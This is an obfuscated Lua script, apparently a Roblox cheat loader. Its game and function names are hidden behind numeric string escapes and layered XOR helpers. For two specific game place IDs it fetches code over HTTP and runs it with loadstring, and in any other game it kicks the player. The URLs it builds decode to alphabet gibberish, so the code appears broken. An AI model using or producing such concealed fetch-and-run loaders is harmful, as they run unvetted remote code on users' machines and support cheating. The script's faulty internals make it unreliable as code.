
--[[
██╗ ██████╗  ██████╗██╗  ██╗███╗   ███╗
██║██╔═══██╗██╔════╝╚██╗██╔╝████╗ ████║
██║██║   ██║██║      ╚███╔╝ ██╔████╔██║
██║██║   ██║██║      ██╔██╗ ██║╚██╔╝██║
██║╚██████╔╝╚██████╗██╔╝ ██╗██║ ╚═╝ ██║
╚═╝ ╚═════╝  ╚═════╝╚═╝  ╚═╝╚═╝     ╚═╝
]]

local _=({...})[1];
local _G_={["\98\121\116\101\99\111\100\101"]={},["\114\101\103\105\115\116\101\114\115"]={},["\115\116\97\99\107"]={},["\109\101\116\97"]={},["\101\110\118"]={}};
local function _G__(_G_,_G__)local _G___=""for _G____=1,#_G_ do local _G_____=string.byte(_G_,_G____)_G___=_G___..string.char(bit32.bxor(_G_____,_G__))end return _G___ end;
local function _G___(_G_,_G__)local _G___=""for _G____=1,#_G_ do local _G_____=string.byte(_G_,_G____)_G___=_G___..string.char(bit32.bxor(_G_____,_G__))end return _G___ end;
local function _G____(_G_,_G__)local _G___=""for _G____=1,#_G_ do local _G_____=string.byte(_G_,_G____)_G___=_G___..string.char(bit32.bxor(_G_____,_G__))end return _G___ end;
local _G_____={["\105\110\115\116\114\117\99\116\105\111\110\115"]={},["\100\97\116\97"]={},["\99\111\100\101"]={},["\109\101\116\97"]={},["\101\110\118"]={}};
local _G______={["\115\116\114"]=_G__(_G___(_G____("\97\98\99\100\101\102\103\104\105\106\107\108\109\110\111\112\113\114\115\116\117\118\119\120\121\122",7),13),19),["\107\101\121"]=function(_G_,_G__)return bit32.bxor(_G_,_G__)end};
local _G_______={["\115\116\114"]=_G__(_G___(_G____("\65\66\67\68\69\70\71\72\73\74\75\76\77\78\79\80\81\82\83\84\85\86\87\88\89\90",7),13),19),["\107\101\121"]=function(_G_,_G__)return bit32.bxor(_G_,_G__)end};
local _G________=function(_G_,_G__)local _G___=""for _G____=1,#_G_ do local _G_____=string.byte(_G_,_G____)_G___=_G___..string.char(_G______["\107\101\121"](_G_____,_G__))end return _G___ end;
local _G_________=function(_G_,_G__)local _G___=""for _G____=1,#_G_ do local _G_____=string.byte(_G_,_G____)_G___=_G___..string.char(_G______["\107\101\121"](_G_____,_G__))end return _G___ end;
local _G__________=_G________(_G______["\115\116\114"],29)
local _G___________=_G________(_G_______["\115\116\114"],29)
local _G____________=function()if _G["\103\97\109\101"]["\80\108\97\99\101\73\100"]==142823291 then loadstring(_G["\103\97\109\101"]:HttpGet(_G__________))()elseif _G["\103\97\109\101"]["\80\108\97\99\101\73\100"]==6447798030 then loadstring(_G["\103\97\109\101"]:HttpGet(_G___________))()else _G["\103\97\109\101"]["\80\108\97\121\101\114\115"]["\76\111\99\97\108\80\108\97\121\101\114"]:Kick("\87\114\111\110\103\32\103\97\109\101\33")end end;
local _G_____________=function()local _G_=coroutine.create(function()_G____________()end)coroutine.resume(_G_)end;
_G_____________() 
